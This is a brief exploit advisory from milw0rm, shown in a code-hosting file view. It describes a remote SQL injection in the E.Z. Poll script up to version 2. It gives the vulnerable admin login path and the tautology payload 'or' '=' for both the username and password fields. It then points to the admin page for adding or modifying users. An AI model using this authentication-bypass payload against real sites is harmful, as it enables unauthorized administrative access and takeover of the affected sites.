20 lines
423 B
Text
Executable file
20 lines
423 B
Text
Executable file
Description:
|
|
************* ***************** ************* *******************
|
|
E.Z. Poll <= v.2 script Remote SQL injection Exploit
|
|
discovered by t0fx aka xtof69
|
|
vendor : E.Z.
|
|
|
|
|
|
************* ***************** ************* *******************
|
|
|
|
vulnerable page : http://www.site.com/admin/login.asp
|
|
|
|
exploit :
|
|
|
|
Username : 'or' '='
|
|
Password : 'or' '='
|
|
|
|
Add, modify user :
|
|
/admin/admin-users.asp
|
|
|
|
# milw0rm.com [2008-12-01]
|